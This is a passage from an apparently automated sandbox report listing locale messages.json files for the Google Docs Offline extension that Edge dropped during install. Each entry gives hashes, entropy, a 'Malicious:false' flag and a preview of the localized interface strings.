                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):934
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                          MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                          SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                          SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                          SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):963
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                          MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                          SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                          SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                          SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1320
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                          MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                          SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                          SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                          SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):884
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                          MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                          SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                          SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                          SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):980
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                          MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                          SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                          SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                          SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1941
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                          MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                          SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                          SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                          SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1969
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                          MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                          SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                          SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                          SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1674
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                          MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                          SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                          SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                          SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1063
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                          MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                          SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                          SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                          SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1333
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                          MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                          SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                          SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                          SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1263
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                          MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                          SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                          SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                          SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1074
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                          MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                          SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                          SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                          SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):879
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                          MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                          SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                          SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                          SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1205
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                          MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                          SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                          SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                          SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):843
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.76581227215314
